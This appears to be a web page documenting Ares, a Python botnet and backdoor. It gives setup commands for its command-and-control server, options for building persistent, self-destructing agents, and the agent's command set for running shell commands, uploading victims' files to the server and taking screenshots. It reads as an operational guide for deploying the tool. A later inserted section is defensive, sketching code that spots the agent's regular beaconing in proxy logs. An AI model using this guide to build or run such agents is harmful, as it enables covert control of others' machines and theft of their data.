Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control (CnC) server, which is a Web interface to administer the agents
  • An agent program, which runs on the compromised host and handles communication with the CnC

The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.

Setup

Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
./ares.py initdb
In order to compile Windows agents on Linux, set up Wine (optional):
./wine_setup.sh

Server

Run with the built-in (debug) server:
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b 0.0.0.0:8080 --threads 20
The server should now be accessible on http://localhost:8080

Agent

Run the Python agent (update config.py to suit your needs):
cd agent
./agent.py
Build a new agent to a standalone binary:
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
To see a list of supported options, run ./builder.py -h
./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]
                  [--persistent]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle.
                        In idle mode, the agent pulls commands less often
                        (every <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
                        row.
  --persistent          Automatically install the agent on first run.
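
Because the agent requests the CnC at a fixed delay (--hello-interval), its traffic shows up in proxy logs as one client contacting one destination at a near-constant interval. The following detection sketch is an added example, not part of Ares or of the original page; the log format, host names, addresses and thresholds are constructed assumptions.

```python
"""Flag client/destination pairs whose requests arrive at a near-constant interval."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median


def sample_log():
    """Constructed proxy log: '<ISO time> <client> <destination>' per line."""
    start = datetime(2024, 1, 1, 9, 0, 0)
    lines, t = [], 0
    # ws-17: one request about every 60 s (+/-1 s jitter), with a short fast burst.
    for i in range(24):
        t += 5 if 10 <= i < 13 else 60 + (i % 3) - 1
        lines.append(f"{(start + timedelta(seconds=t)).isoformat()} ws-17 203.0.113.10:8080")
    # ws-22: ordinary browsing with irregular gaps.
    t = 0
    for gap in (3, 41, 7, 230, 12, 95, 4, 610, 33, 18, 150, 2):
        t += gap
        lines.append(f"{(start + timedelta(seconds=t)).isoformat()} ws-22 www.example.org:443")
    return lines


def find_beacons(lines, min_requests=10, tolerance=0.10, min_fraction=0.8):
    """Return {(client, dest): (interval_seconds, matching_fraction)} for periodic pairs."""
    seen = defaultdict(list)
    for line in lines:
        stamp, client, dest = line.split()
        seen[(client, dest)].append(datetime.fromisoformat(stamp))
    hits = {}
    for pair, stamps in seen.items():
        if len(stamps) < min_requests:
            continue  # too few requests to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        typical = median(gaps)
        if typical <= 0:
            continue
        # Scoring against the median tolerates a few outliers (bursts, missed polls).
        close = sum(1 for g in gaps if abs(g - typical) <= tolerance * typical)
        fraction = close / len(gaps)
        if fraction >= min_fraction:
            hits[pair] = (typical, round(fraction, 2))
    return hits


if __name__ == "__main__":
    for (client, dest), (interval, fraction) in find_beacons(sample_log()).items():
        print(f"{client} -> {dest}: ~{interval:.0f}s interval, {fraction:.0%} of gaps match")
```

Legitimate software (update checks, telemetry, mail clients) also polls on a timer, so hits from this kind of check are leads to triage against an allow-list, not verdicts.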

Supported agent commands:
<any shell command>
    Executes the command in a shell and returns its output.

upload <local_file>
    Uploads <local_file> to server.

download <url> <destination>
    Downloads a file through HTTP(S).

zip <archive_name> <folder>
    Creates a zip archive of the folder.

screenshot
    Takes a screenshot.

python <command|file>
    Runs a Python command or local file.

persist
    Installs the agent.

clean
    Uninstalls the agent.

exit
    Kills the agent.

help
    This help.

Source: www.effecthacking.com